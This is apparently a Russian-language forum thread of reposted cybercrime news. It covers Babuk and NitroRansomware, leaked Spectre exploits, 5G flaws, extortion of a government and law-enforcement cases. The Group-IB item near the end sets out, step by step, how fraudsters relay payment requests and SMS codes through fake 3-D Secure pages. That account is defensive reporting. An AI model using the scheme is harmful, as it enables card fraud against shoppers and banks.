Также недавно Британское Национальное агентство по борьбе с преступностью (NCA) сообщило, что в рамках операции PowerOff создало целую сеть поддельных сайтов, где якобы можно было заказать DDoS-атаку. Таким способом NCA выявляет людей, которые захотят воспользоваться DDoS-услугами и использовать эти платформы для атак.
• Source: https://www.presseportal.de/blaulicht/pm/43563/5476672
• Source: https://krebsonsecurity[.]com/2023/03/german-police-raid-ddos- friendly-host-flyhosting
Хакер группа пригрозила, что, если правительство не свяжется с ними, они начнут продавать украденную информацию breached.to cracked[.]io и xss.is, начиная с 19 числа этого месяца
Hidden content for authorized users.
источник:

一个自称为“灰帽子”(gray hat)的骇客组织向政府发布一封勒索信,宣称已掌握大量关于政府部门公务员及国会议员的个人资料信息,并恫言若政府不回应,他们会于本月19日在网上公开贩卖资料。...
www.sinchew.com.my
оффтоп
Интересно деффки пляшут. Ломанули, угрожали, написали в СМИ, срок уже истек -
а кто такие так и не понятно.
Но видимо скоро тут будет на продажу)))
Эксперты компании McAfee выпустили [отчет](https://www.mcafee.com/blogs/other- blogs/mcafee-labs/babuk-biting-off-more-than-they-could-chew-by-aiming-to- encrypt-vm-and-nix-systems/) о шифровальщике Babuk, в котором пришли к выводу, что попытки сделать малварь кросспатформенной и использовать против Linux/UNIX и ESXi или VMware обернулись неудачей.
Напомню, что еще в начале года создатели Babuk сообщали, что разработали версию вымогателя для *nix, так как многие бэкэнды в крупных компаниях работают вовсе не под управлением Windows. Однако, по данным исследователей, шифровальщик был написан со множеством ошибок, которые «приводили к необратимому повреждению данных».
«Похоже, Babuk провел живой бета-тест на своих жертвах, когда дело дошло до разработки бинарника и дешифратора на Golang. Мы наблюдали, что несколько машин пострадавших оказались зашифрованы без возможности восстановления данных из-за неисправного бинарника и неисправного дешифратора», — пишут эксперты McAfee.
Click to expand...
Таким образом, даже если жертва согласится заплатить хакерам выкуп, расшифровать пострадавшие файлы не удастся. Эксперты надеются, что в конечном итоге это повлияет на отношения разработчиков Babuk с «партнерами», которые занимаются непосредственно атаками и заражают сети жертв малварью. Если пострадавшие не смогут вернуть свои данные даже после уплаты выкупа, их недовольство обратится на «партнеров» Babuk.
Так как уничтожение данных вместо их шифрования менее выгодно с точки зрения преступников, эксперты полагают, что именно полная неработоспособность *nix- версии Babuk и дешифровщика заставила хакеров перейти к кражам данных и вымогательству, отказавшись от шифрования.
Напомню, что ранее в этом году операторы Babuk объявили о прекращении работы (после громкой атаки на полицейское управление Вашингтона). Считается, что хакеры переименовали свой «сайт утечек» в Payload.bin, и готовы были предоставлять его другим преступникам как сторонний хостинг, куда можно слить чьи-то файлы, не заводя для этих целей собственный сайт, а также в качестве площадки, на которой смогут «встречаться» вымогатели, брокеры доступов и другие преступники. Ведь недавно почти на всех крупных хак-форумах [запретили](https://xakep.ru/2021/05/27/darkside-vs- colonial-pipeline/) любые обсуждения связанные с шифровальщиками и вымогательским ПО. Однако, похоже, дела у группировки идут не слишком хорошо, а форум не смог завоевать популярность, зато подвергался DDoS-атакам и страдал от различных багов.
Что касается неудачного дешифровщика Babuk, исследователи рассказывают о нем следующее:
«В целом, дешифровщик плохой, поскольку он ищет только расширение .babyk и пропускает любые файлы, которые жертва могла переименовать, в попытке их восстановить. Кроме того, дешифровщик проверяет, превышает ли размер файла 32 байта, так как последние 32 байта объединяются позже с другими жестко закодированными значениями для получения ключа. Это плохая разработка, ведь эти 32 байта могут оказаться мусором, а не ключом».
Click to expand...
На прошлой неделе американские власти официально возложили на Россию ответственность за атаку на компанию SolarWinds и ее клиентов. Администрация Джо Байдена заявила, что за атакой стояла Служба внешней разведки России и ее «правительственные хакеры», известные как APT 29, Cozy Bear или The Dukes. По данным властей, они «использовали платформу SolarWinds Orion и другие ИТ- инфраструктуры в рамках широкомасштабной кибершпионской кампании».
В этот же день Министерство финансов США ввело санкции против шести российских ИТ-компаний, которые, по мнению правительства США, помогали СВР и ГРУ своими техническими знаниями и услугами во время прошлых операций. Санкции коснулись Технополис «Эра», АО «Пасит», Федерального государственного автономного научного учреждения «Научно-исследовательский институт специализированных вычислительных устройств и автоматики безопасности», ООО «Необит», АО «Передовые системные технологии», а также АО «Позитив Текнолоджиз». Помимо них под санкции попали информационные агентства Southfront, «Ньюсфронт», «Инфорос» и фонд стратегической культуры России.
В частности, американский Минфин заявил, что Positive Technologies имеет клиентов в правительстве России, включая ФСБ, а также регулярно проводит крупномасштабные конвенции, где ФСБ и ГРУ вербуют для себя новых сотрудников.
Ранее представители Positive Technologies уже обнародовали официальный ответ, в котором компания отвергла все выдвинутые американскими властями обвинения. Теперь же компания опубликовала открытое письмо-обращение к коммьюнити, написанное управляющим директором, Денисом Барановым. Ниже цитируем это послание полностью.
Всем привет!
Произошедшие события обернулись для нас в первую очередь огромным количеством слов поддержки. Мы видим поддержку в комментариях к сообщениям в соцсетях, в личных сообщениях, звонках. Вы не представляете, насколько мы вам за это благодарны.
За годы работы мы обнаружили и помогли исправить огромное количество уязвимостей в приложениях и аппаратных системах, разработанных практически всеми известными вендорами, включая Cisco, Citrix, Intel, Microsoft, Siemens, VMware.
Мы бы не смогли этого сделать без привлечения лучших исследователей в области информационной безопасности, а также без активной позиции вендоров и готовности работать с исследовательскими центрами наподобие нашего для исправления всех этих уязвимостей. Нам в этом очень помогало разделение принципов ответственного разглашения (responsible disclosure), согласно которым все данные об обнаруженных уязвимостях уходят во внешний мир только по согласованию с вендором и после того, как вендор эту уязвимость исправит и доставит исправления своим клиентам.
В результате наших с вами действий мир становится чуточку лучше и безопаснее.
Для того чтобы сплотить наше с вами комьюнити, мы организовали крупнейший в России международный форум по информационной безопасности — Positive Hack Days, и смогли привлечь к диалогу на этой площадке как специалистов по ИБ из разных компаний и руководителей бизнеса, небезразличных к кибербезу, так и «парней в футболках» — белых (white hat) хакеров и исследователей, реально понимающих, как тестировать системы на проникновение, и готовых делиться своим опытом.
Чтобы получать практические знания о том, как в реальных условиях будут действовать злоумышленники, мы уже десять лет проводим соревнования white- hat-хакеров и специалистов защиты компаний на специально подготовленном полигоне The Standoff, инфраструктура которого построена на системах, реально использующихся в окружающем нас мире, потому что только так мы можем понять, как эти компоненты могут быть атакованы и как от этих атак защищаться. Через The Standoff и PHDays прошли CTF-команды из многих стран, включая Россию, США, Казахстан, Индию, Японию, ОАЭ. Знания на этом полигоне получали в том числе и лучше в мире СTF-команды, такие как команда PPP из Университета Карнеги — Меллона.
Согласно нашим принципам открытости знаний для сообщества, каждый мог принять участие — послушать доклады, отточить свои навыки в поиске уязвимостей или отражении хакерских атак, просто последить за трафиком во время мероприятия и унести эти знания с собой, для того чтобы лучше защищать свои компании, разрабатывать продукты, которые смогут более качественно отражать кибератаки, создавать более безопасные решения и компоненты.
Принципы открытости информации и знаний, ответственного разглашения при исследовании систем на наличие уязвимостей и практический подход к кибербезопасности — это наши ключевые ценности. А значит, ждите от нас новых исследований в области практической ИБ, нашей поддержки сообщества и новых конференций!
Спасибо вам огромное за поддержку, и ждем вас на PHDays 10!
Вот сборник наших лучших исследований в области практической кибербезопасности за последние три года — читайте и делитесь со своими коллегами в сообществе!
Денис Баранов, Управляющий директор Positive TechnologiesClick to expand...
Источник: xakep.ru/2021/04/21/pt-open-letter/
Французский ИБ-специалист Жюльен Вуазен (Julien Voisin) сообщил, что в начале февраля 2021 года месяце некто загрузил на VirusTotal эксплоиты для уязвимости Spectre. Это первый случай, когда «боевой» эксплоит для данной проблемы стал достоянием общественности.
Напомню, что оригинальная проблема Spectre была обнаружена в 2018 году наряду с багом Meltdown. Эти фундаментальные недостатки в архитектуре современных процессоров позволяют легко нарушить изоляцию адресного пространства, прочитать пароли, ключи шифрования, номера банковских карт, произвольные данные системных и других пользовательских приложений в обход любых средств защиты и на любой ОС.
Фактически три года назад эти проблемы вынудили производителей процессоров пересмотреть подход к проектированию CPU, ясно дав понять, что нельзя сосредотачиваться лишь на производительности в ущерб безопасности.
Вскоре после обнаружения Meltdown и Spectre ИБ-специалисты заметили, что авторы вредоносных программ активно экспериментируют с этими уязвимостями, а в сети в целом и на VirusTotal в частности можно было найти следы этой деятельности. К счастью, в итоге всё это ни к чему не привело, и в реальности так и не было найдено никаких доказательств эксплуатации обеих уязвимостей.
Теперь же, по данным Вуазена, ситуация изменилась. Он пишет, что обнаружил новые, отличные от предыдущих эксплоиты для Spectre — один для Windows и один для Linux. В частности, версия для Linux способна обнулять содержимое файла /etc/shadow, в котором хранятся сведения об учетных записях пользователей ОС. Это определенно вредоносное поведение, однако пока нет никаких доказательств того, что сам эксплоит применялся на практике, а не был загружен на VirusTotal каким-то пентестером.
Также Вуазен намекает, что он понял, кто мог стоять за созданием эксплоитов. По его словам, атрибуция в данном случае весьма тривиальная, и читатели блога смогут догадаться обо всем самостоятельно.
В итоге ИБ-эксперты в Twitter и на HackerNews провели собственный анализ и быстро обнаружили, что новый эксплоит для Spectre может быть модулем для пентестерского инструмента CANVAS, разработанного Immunity Inc. Похоже, что в Twitter на это же намекает и бывший глава Immunity Дэйв Айтель, отмечая, что компания рекламировала этот модуль еще в феврале 2018 года.
__https://twitter.com/x/status/1366419538254958598
__https://twitter.com/x/status/959155986098421760
Кроме того, анонимный источник подтвердил ИБ-изданию The Record, что недавно на хакерском форуме RAID была опубликована взломанная версия Immunity CANVAS v7.26, а также взломанные копии White Phosphorus и D2 (два пакета расширений для CANVAS, содержащие наборы эксплотов для различных уязвимостей). Среди тех уязвимостей был и эксплоит для проблемы CVE-2017-5715, которая носит имя Spectre.
Известно, что взломанные версии этого инструментария распространяются в частных Telegram-каналах по меньшей мере с октября 2020 года. Судя по всему, именно они послужили источником эксплоитов, загруженных в прошлом месяце на VirusTotal.
 
Источник: xakep.ru/2021/03/02/spectre-exploit/
Парень думал, что так сэкономит вдвое.
32-летний Андрей в апреле прошлого года приглядел себе новенький Nissan GT-R (такой был у Брайна О’Коннера), но решил купить его подешевле: в России такое авто стоит 5 млн рублей, а при перегоне из Японии думал, что получится в два раза дешевле. Через брата вышел на парня из Хабаровска, который занимается перегоном машин. Тот пообещал ему доставку без проблем с доками и таможкой через Владивосток. Но сказал, что возьмётся за дело только после полной предоплаты за услуги и сам спорткар, и попросил скинуть 2,1 млн рублей. Андрей перевёл и стал ждать.
А дальше — сюжет для нового "Форсажа": сперва дилер сообщил Андрею, что доставку перенесли на поздний срок, из-за этого просрочились документы и нужно всё заново оформить. Когда дело сдвинулось, возникли новые проблемы: плохая погода и не было людей, которые могли доставить спорткар до Москвы. Продавец заверял, что тачка уже в таможенном порту Владивостока, но на просьбу Андрея прислать фотки молчал.
Крутые виражи продолжались чуть больше года, пока парень не обратился в полицию. Сейчас полиция разбирается, что на самом деле с машиной и деньгами Андрея.
Аналитики Positive Technologies [сообщили](https://www.ptsecurity.com/ru- ru/research/analytics/aktualnye-kiberugrozy-dlya-organizacij- itogi-2023-goda/), что 2023 год ознаменовался рекордными выкупами операторам вымогательского ПО, а также заметным увеличением масштабов и сложности атак шифровальщиков. Так, выплаты вымогателям в прошлом году составили более 1 млрд долларов, что является самым высоким показателем за всю историю.
По данным исследователей, больше всего от атак вымогателей в прошлом году пострадали медицинские организации (18% всех инцидентов пришлось на медицинскую отрасль), что привело к закрытию некоторых учреждений, перенаправлению карет скорой помощи в другие больницы и задержке в предоставлении медицинских услуг.
К примеру, с серьезным ущербом в результате атаки группировки Rhysida столкнулась американская медицинская компания Prospect Medical Holdings. Российская лабораторная служба «Хеликс», по данным СМИ, также подверглась атаке шифровальщика. Злоумышленники пытались нарушить работу лабораторных комплексов и спровоцировать утечку персональных данных. В результате произошла задержка в выдаче результатов исследований клиентам. В компании заявляли, что потери чувствительных данных удалось избежать.
Также в четверку наиболее атакуемых шифровальщиками отраслей по итогам года также вошли организации из сферы науки и образования (14%), государственные учреждения (12%) и промышленные организации (12%).
[](https://xakep.ru/wp- content/uploads/2024/04/459466/chart-18.png)
Большинство шифровальщиков распространялось с помощью электронной почты (62%) и путем компрометации компьютеров и серверов (35%).
По данным Positive Technologies, в 2023 году злоумышленники переключились с простого шифрования на угрозу публикации украденных данных. Если цель злоумышленников — не остановка основного вида деятельности компании-жертвы, а получение денежных средств, то атаки могут вообще обходиться без шифрования: злоумышленники могут требовать выкуп, угрожая публичным раскрытием украденных данных (двойное вымогательство).
В итоге выплаты вымогателям перевалили за 1 миллиард долларов, что стало самым высоким показателем за всю историю.
Например, в результате атаки одна из крупнейших компаний в сфере гостиничного и развлекательного бизнеса Caesars Entertainment понесла убытки в размере 15 млн долларов. Компания согласилась выплатить выкуп вымогателям (причем изначально злоумышленники требовали у компании вдвое больше — 30 000 000 долларов), которые угрожали опубликовать украденные данные клиентов из программы лояльности.
[](https://xakep.ru/wp- content/uploads/2024/04/459466/chart-19.png)Последствия атак с использованием шифровальщиков
«В 2023 году акцент сместился с шифрования на использование украденных данных для получения денежной выгоды через вымогательство. Этот тренд появился сформировался в связи с тем, что организации начали внедрять более комплексные меры защиты, — с точки зрения злоумышленников, это делает атаки шифровальщиков менее эффективными. Кроме того, отказ от шифрования и переход к вымогательству через угрозу публикации украденных данных может быть обусловлен выпуском специалистами по безопасности различных дешифраторов», — комментирует Ирина Зиновкина, руководитель исследовательской группы Positive Technologies.
Click to expand...
Гэри Боузер, один из руководителей Team-Xecuter, признал свою вину в громком судебном деле, инициатором которого выступила Nintendo. Напомним, что Боузера вместе с коллегой задержали в Доминикане в октябре прошлого года, после чего экстрадировали в США по требованию правоохранительных органов.
Баузер первоначально отрицал какие-либо обвинения в свой адрес, но на прошлой неделе он изменил свою позицию и признал себя виновным.
Баузер также добровольно согласился выплатить Nintendo 4,5 миллиона долларов в качестве компенсации. Он также согласился помочь найти все оставшиеся активы Team-Xecuter.
Несмотря на соглашение о признании вины Боузеру грозит до пяти лет тюрьмы. Содействие расследованию дает шанс на смягчение приговора, но правительство не дает никаких гарантий. При этом с хакера все же сняли другие обвинения, из-за которых максимальный срок мог бы быть гораздо больше.
Уже много лет обсуждают тему про взлом наших крипторгафических сообщений, квантовыми компьютерами. Вроде как мы понимаем, быстро они к этому не придут. Но мысль, что собираемые наши шифротексты могут в будущем взломать и предъявить нам за них реальные сроки меня настораживает. Может придумаем здесь и сейчас методы противодействия!?
Некоторые фирмы уже предпринимают усилия по созданию новых алгоритмов
шифрования, недоступных для квантовых компьютеров.
Квантовые компьютеры смогут взломать большую часть современных алгоритмов шифрования, раскрывая личные сообщения, данные компаний и военные секреты. Компании в сфере информационных технологий хорошо осведомлены об этой потенциальной угрозе. Некоторые фирмы предприняли усилия по созданию, тестированию и внедрению новых алгоритмов шифрования, недоступных для квантовых компьютеров. IBM и Thales, например, уже начали предлагать продукты, защищенные так называемой постквантовой криптографией. Об этом сообщило издание CNET.
Квантовые компьютеры в недалеком будущем смогут взламывать цифровые подписи, обеспечивающие целостность обновлений приложений, браузеров, операционных систем и другого программного обеспечения, открывая путь для вредоносных программ.
По словам технического директора компании Cloudflare Джона Грэма-Камминга (John Graham-Cumming), существует большая неопределенность — может пройти пять лет, прежде чем квантовые компьютеры смогут взломать шифрование, или могут потребоваться все двадцать лет. Cloudflare уже протестировала постквантовую защиту и планирует принять для внутренних операций в нынешнем году.
Проблема также связана с тем, что сегодняшние зашифрованные данные могут быть похищены сейчас и взломаны позже.
Обычному компьютеру потребуется около 300 триллионов лет, чтобы взломать коммуникации, защищенные 2048-битным цифровым ключом. Но квантовому компьютеру, работающему на 4099 кубитах, потребуется всего 10 секунд. В 2029 году Google намерена построить квантовый компьютер с 1000 «логических» кубитов, достаточно стабильных, чтобы выполнять длительные вычисления.
Эксперты также рекомендуют применить гибридный подход, который обеспечивает двойную защиту данных с помощью как обычного, так и постквантового шифрования. Это позволяет системным администраторам раньше использовать постквантовую криптографию, не беспокоясь об уязвимостях, которые могут быть обнаружены в относительно новых алгоритмах.
Подробнее: https://www.securitylab.ru/news/520576.php
Издание Bleeping Computer рассказало о вымогателе NitroRansomware, который шифрует файлы жертв, похищает информацию из браузеров, а затем требует подарочные коды Discord Nitro для оплаты выкупа.
Хотя сам Discord бесплатен, пользователи могут приобрести подписку Nitro за 9,99 долларов в месяц, которая предоставляет доступ к премиальным возможностям, включая увеличенный размер загрузок, улучшенные эмодзи, анимированные аватары и так далее. Причем подписку Nitro можно применить как к своей учетной записи, так и купить в качестве подарка для другого человека. Во втором случае покупателю будет предоставлен URL-адрес в формате https://discord.gift/ code, который затем можно передать другому пользователю Discord.
В отличие от других вымогателей, шифровальщик NitroRansomware требует от своих жертв не огромные суммы в криптовалюте, но подарочный код для Nitro за 9,99 долларов.
Судя по именам файлов из образцов NitroRansomware, предоставленных журналистам MalwareHunterteam, вымогатель распространяется под видом фейкового инструмента для генерации бесплатных подарочных кодов Nitro. После запуска малварь шифрует файлы жертвы и добавляет к ним расширение .givemenitro.
Затем вымогатель сменит обои пользователя и покажет экран с требованием выкупа, требуя предоставить бесплатный подарочный код Nitro в течение трех часов, в противном случае малварь угрожает удалить все зашифрованные файлы. Это, по словам журналистов, является пустой угрозой, и NitroRansomware не удаляет файлы, когда таймер достигает нуля.
Когда пользователь предоставляет малвари URL-адрес подарочного кода Nitro, вымогатель проверяет его, используя Discord API, как показано ниже. Если ссылка на подарочный код действительна, вымогатель расшифрует файлы с помощью встроенного статического ключа дешифрования.
Издание подчеркивает, что поскольку ключи дешифрования статичны и содержатся в исполняемом файле малвари, файлы можно расшифровать и без выплаты выкупа.
К сожалению, одним только шифрованием данных вымогатель не ограничивается. Также злоумышленники пытаются похитить токены Discord жертвы (ключи аутентификации, привязанные к конкретному пользователю) и украсть данные из браузеров Chrome, Brave и Яндекс.Браузер. Из-за этого жертвам NitroRansomware рекомендуется сразу после атаки сменить свой пароль в Discord.
Источник: xakep.ru/2021/04/19/nitroransomware/[/code]
Следственным управлением УСК по Гомельской области завершено расследование уголовного дела об использовании вредоносных программ, возбужденного по материалам главного управления по противодействию киберпреступности МВД Республики Беларусь.
Следствием установлено, что 20-летний житель Гомеля приобрел на интернет- площадках несколько программ, предназначенных для незаконного подбора паролей к учетным записям пользователей различных интернет-ресурсов. Также молодой человек приобрел множество данных, содержащих конфиденциальную информацию об аккаунтах игроков двух компьютерных игр.
В период с октября 2019 года по май 2020 года гомельчанин при помощи вредоносных программ тестировал игровые аккаунты и выбирал действующие «прокаченные» учетные записи, которые в последующем перепродавал другим пользователям. При осмотре следователем изъятой у фигуранта компьютерной техники были обнаружены сведения о более чем 10 миллионах чужих аккаунтов. Общая сумма поступивших от покупателей денежных средств составила не менее 16 тысяч рублей. Полученные деньги парень тратил на личные нужды, в том числе на свое увлечение игровыми автоматами.
Кроме того, при установлении круга общения молодого человека и исследовании его переписки с иными лицами в мессенджерах и социальных сетях в его телефоне были обнаружены файлы с порнографическими материалами.
На основании собранных по делу доказательств жителю Гомеля предъявлено обвинение по ч.1 ст.354 (заведомое использование существующих компьютерных программ с целью несанкционированного копирования информации, хранящейся в компьютерной системе, сети и на машинных носителях) и по ч.2 ст.343 (хранение с целью распространения и распространение с использованием глобальной компьютерной сети Интернет порнографических материалов) Уголовного кодекса Республики Беларусь. Обвиняемый полностью признал вину и раскаялся в содеянном.
Суд Советского района г. Гомеля вынес обвинительный приговор и назначил фигуранту наказание в виде ограничения свободы на срок три года, а также постановил взыскать с него в доход государства денежные средства, полученные от использования вредоносных программ. Приговор вступил в законную силу.
Банк России определил критерии, которые позволят банкам выявлять карты и электронные кошельки, используемые теневым бизнесом. К таковому регулятор отнес криптовалютные обменники, а также незаконные онлайн-казино, финансовые пирамиды и нелегальных форекс-дилеров.
Рекомендации ЦБ касаются переводов между физлицами. Банки должны анализировать операции и оперативно выявлять сомнительные транзакции. Клиента можно считать подозрительным, если в ходе мониторинга его операции соответствуют двум и более признакам:
большое количество контрагентов-физлиц (плательщиков или получателей) — например, более 10 в день, более 50 в месяц;
большое количество операций по зачислению или списанию безналичных средств (увеличению или уменьшению остатка электронных средств), проводимых с физлицами — например, более 30 операций в день;
значительные объемы операций по списанию и (или) зачислению безналичных средств, совершаемых между физлицами — например, более 100 000 рублей в день, более 1 млн рублей в месяц;
короткий промежуток времени (одна минута и менее) между зачислением средств и списанием;
в течение 12 часов (и более) одних суток проводятся операции по зачислению и (или) списанию средств;
в течение недели средний остаток средств на банковском счете на конец операционного дня не превышает 10% от среднедневного объема операций по банковскому счету в указанный период;
операции по списанию средств характеризуются отсутствием платежей в пользу юрлиц или ИП для обеспечения жизнедеятельности физлица — например, оплата коммунальных услуг, иных товаров и работ;
совпадение идентификационной информации об устройстве (например, MAC-адрес, цифровой отпечаток устройства), используемом разными клиентами–физлицами для удаленного доступа к услугам по переводу средств.
В случае соответствия этим критериям банку рекомендуют обратить повышенное внимание на операции физлица, блокировать операции в случае подозрений на отмывание средств и даже расторгнуть договор банковского счета.
В ЦБ утверждают, что участники теневого бизнеса осуществляют прием платежей от граждан и обратные выплаты не со своих расчетных счетов, а «с подконтрольных им банковских карт и электронных кошельков, зачастую оформленных на подставных физических лиц». Новые рекомендации предположительно помогут в борьбе с этим.
Ранее ЦБ РФ призвал биржи не допускать к торгам инструменты с привязкой к криптовалютам.
Специалисты компании AdaptiveMobile опубликовали отчет о новых уязвимостях в протоколе 5G, благодаря которым можно выводить из строя сегменты сети (DoS) и похищать пользовательские данные, включая информацию о местоположении.
Выявленные проблемы связаны с механизмом разделения сетей 5G, который позволяет операторам дробить свою инфраструктуру на более мелкие блоки, предназначенные для конкретных сфер использования (например, автомобилестроение, здравоохранение, критическая инфраструктура и развлечении и так далее).

Обнаруженные уязвимости могут использоваться в гибридных мобильных сетях, где 5G смешивается с более старыми технологиями. Именно такие варианты будут встречаться в реальном мире в ближайшие годы, когда технология 5G будет постепенно заменять собой остальные.
Атаки возможны в силу недостатков маппинга между идентификаторами application и транспортного уровней, что позволяет потенциальным злоумышленникам выдать себя за легитимные сетевые функции в гибридных сетях 5G.
В итоге, если злоумышленнику удастся скомпрометировать периферийное сетевое оборудование оператора, он может злоупотребить функциями 5G для реализации DoS-атак против других сегментов сети или извлечения информации из соседних сегментов сети, включая данные абонентов (например, данные о местоположении). Также исследователи предупреждают, что возможны сценарии, когда партнеры оператора, которым предоставлен доступ к сегментам сети, могут злоупотреблять своими привилегиеями для атак на другие части сети.

Специалисты AdaptiveMobile уже уведомили о проблемах консорциум 3GPP (отвечающий за разработку стандарта 5G), организацию GSMA и отраслевую группу операторов мобильной связи. Эксперты говорят, что для защиты от описанных атак может потребовать разработка некоторых крупных функций, которые могут войти в Release 17.
Release 17 (или Rel-17) — это версия стандарта 5G, которая в настоящее время находится в разработке и должна быть выпущена в середине 2022 года .
Источник: xakep.ru/2021/03/26/5g-bugs/
Group-IB, предупреждает о появлении нового типа мошенничества с использованием подложных страниц подтверждения платежей 3-D Secure при покупках товаров и услуг в интернете. По данным Group-IB, ежемесячно происходит около 3,7 млн случаев мошенничества с использованием подложных 3-D Secure страниц, с которых деньги покупателей уходят напрямую мошенникам через легальную транзакцию в банке. Эксперты Group-IB, специализирующиеся на борьбе с банковским фродом, оценивают ущерб от данной схемы на сумму свыше 400 млн рублей за первые 6 месяцев 2021 года.
Создавая фишинговые сайты под популярные сервисы и онлайн-магазины, мошенники научились имитировать страницы оплаты, якобы защищенные 3-D Secure — технологией, ранее считавшаяся одной из наиболее эффективных для обеспечения защиты платежных данных пользователей при оплате покупок онлайн во всем мире.
Данный тип «развода» специалисты Group-IB впервые зафиксировали в конце 2020 года. Он относится к так называемому Card-Not-Present-мошенничеству (CNP, операции по карте без ее присутствия) и является более изощренным развитием ранее обнаруженной Group-IB схемы мошенничества с P2P-платежами. Опасность использования подложных 3-D Secure страниц состоит в том, что их достаточно сложно выявить, внешне они часто содержат логотипы международных платежных систем Visa, MasterCard или российской МИР и не вызывают подозрений у покупателей, стремящихся быстро оформить покупку онлайн. При этом для банка- эмитента платеж его клиента выглядит легально, и в случае недовольства — клиенту будет крайне сложно вернуть свои деньги, которые он отправил мошенникам через якобы «настоящую» страницу 3-D Secure, подтвердив транзакцию проверочным кодом из СМС.
В Group-IB подчеркивают, что круг пострадавших в данной схеме достаточно широк — это и клиент банка, скорее всего, безвозвратно потерявший свои деньги и не получивший покупку, это банк-эмитент, одобривший транзакцию, это онлайн-сервис или магазин, сайт которого подделали злоумышленники, и платежные системы, чьи бренды нелегально и без их ведома используются в мошеннической схеме.
По оценке Group-IB, лишь единицы крупнейших российских банков сегодня способны защитить своих клиентов от потери денежных средств при реализации сложной, технологически продуманной и многоступенчатой схемы мошенничества с подложными 3-D Secure страницами.
Распознавать фейковых „сотрудников банка“ научились многие, в совершении покупок онлайн нужно быть столь же внимательными. Прежде всего, надо обращать внимание на источник платежа в СМС-сообщении от банка с кодом подтверждения транзакции. Если там указаны слова Card2Card или P2P, а при этом платеж был инициирован не с указанных ресурсов, не стоит вводить полученный код для подтверждения платежа. Банкам необходимо усилить защиту от модифицированной схемы мошенничества, блокируя саму возможность обращения фейковых мерчантов к легитимному серверу 3-D Secure. Как правило, это делается с помощью прямых запросов, генерируемых мошенниками, или автоматизированным способом, т.е. ботами. На данный момент защита от такого типа фрода есть у единиц крупнейших банков страны. Эта ситуация должна меняться, иначе ущерб — финансовый и репутационный — будет расти. По нашим оценкам до конца года он может составить порядка 1 млрд руб.
Как работает схема: не все 3-D Secure страницы одинаково полезны
Описанная весной прошлого года антифрод-командой Group-IB схема мошенничества с P2P-платежами выглядела следующим образом. Привлеченный мошеннической рекламой, спам-рассылкой, продажей товара или услуги на досках объявлений или иным способом, покупатель посещал фишинговую страницу интернет-магазина («мерчанта»). Стремясь оплатить выбранный товар или услугу (билет на поезд, бытовую технику, доставку и др) он вводил на мошенническом ресурсе реквизиты своей банковской карты в форму приема платежа, по аналогии с тем, как это обычно делается на привычных легитимных ресурсах.
Далее его данные попадали на сервер мошенника, откуда происходило обращение к P2P-сервисам различных банков с указанием в качестве получателя одной из карт мошенника. В ответ от P2P-сервиса банка сервер мошенника получал служебное сообщение (так называемое PaReq сообщение), в котором закодирована информация о банковской карте плательщика, сумме перевода, названии и реквизиты использованного P2P-сервиса. Чтобы скрыть от «жертвы» факт использования P2P-сервиса банка на сервере мошенника производится подмена реальной информации на подложные данные об онлайн-магазине. Затем мошенники перенаправляют покупателя на легитимную 3-D Secure страницу банка, но уже с подмененными данными, которые он и видит на этой странице.
Как ни в чем не бывало, жертва вводит платежные данные, оплачивая выбранный товар. Для подтверждения транзакции ей на телефонный номер приходит СМС-код. Она вводит код в ту же форму на легитимной 3-D Secure странице, после чего ее «перебрасывает» обратно на фишинговый ресурс, а деньги уходят на карту мошенника.
Фрод года: враг у банковских ворот
Столкнувшись с этой многоступенчатой схемой мошенничества в прошлом году, банки начали вводить в своих системах дополнительные проверки платежей с сайтов мерчантов. Эффективность и доход от P2P-схемы стали падать.
В ответ на это мошенники модифицировали ее. Прежними остались следующие этапы: привлечение жертвы, создание фишинговой страницы мерчанта, использование P2P-сервисов банков. Далее схема меняется: данные в служебном сообщении (информация о банковской карте плательщика, сумме перевода, названии эквайера и онлайн-магазина) остаются не тронутыми. Вместо легитимной 3-D Secure страницы жертву перенаправляют на подложную, где ему показывается фейковая информация о магазине.
Параллельно с этим с сервера мошенника инициируется обращение к легитимному серверу 3-D Secure с исходным служебным сообщением. Для банка это выглядит так, как если бы пользователь собственными руками переводил средства на карту мошенника через P2P-сервис банка.
В результате банк отправляет держателю карты СМС-код для подтверждения платежа, который пользователь следом вводит на фишинговой 3-D Secure странице. В результате, СМС-код, полученный сервером мошенников с подложной 3-D Secure страницы, используется для обращения к легитимному серверу для подтверждения мошеннического платежа.
Таким образом злоумышленники обходят фактически все проверки, реализованные сегодня на стороне банков для борьбы с такого рода мошенничеством. Большинство банков даже не подозревают о том, как именно мошенники обкрадывают их клиентов, поскольку классические системы анти-фрода расценивают данные транзакции, как легитимные. Как результат банк отказывает клиентам в возврате потерянных денежных средств, поскольку это „добровольный“ платеж, подтвержденный SMS-кодом. Сегодня важнейшим функционалом банковских систем защиты становится умение обнаруживать и блокировать бот-активность, которая почти всегда является частью сложных многоступенчатых типов мошенничества, приносящих злоумышленникам сотни миллионов рублей ежемесячно.
• Source: group-ib.ru/media/3d-secure-fraud/
Немецкая прокуратура конфисковала биткойны на сумму более 50 миллионов евро (67 миллионов долларов) у мошенника. Но есть одна проблема: правоохранители не могут разблокировать деньги, потому что преступник отказался отдать пароль к кошельку.
Человек был приговорен к тюремному заключению и с тех пор отбыл свой срок, хранив молчание, пока полиция неоднократно пыталась взломать код для доступа к более чем 1700 биткойнов, сообщил прокурор баварского города Кемптен.
«Мы спросили его, но он не ответил», - сказал в интервью прокурор Себастьян Мурер. «Возможно, он не знает».
Биткойн хранится в программном обеспечении, известном как цифровой кошелек, который защищен с помощью шифрования. Пароль используется в качестве ключа дешифрования для открытия кошелька и доступа к биткойнам. Когда пароль утерян, пользователь не может открыть кошелек.
Мошенник был приговорен к более чем двум годам тюремного заключения за тайную установку программного обеспечения на другие компьютеры с целью использования их возможностей для «майнинга» биткойнов.
Когда преступник оказался за решеткой, его запас биткойнов стоил бы лишь часть текущей стоимости. Цена биткойна за последний год выросла, достигнув в январе рекордного уровня в 42000 долларов. В пятницу криптовалюта достигла 37 577 долларов, согласно курсовым котировкам.
Однако прокуратура убедилась, что этот человек не может получить доступ к конфискованным средствам.
• Source: https://www.reuters.com/article/technologyNews/idUSKBN2A511T
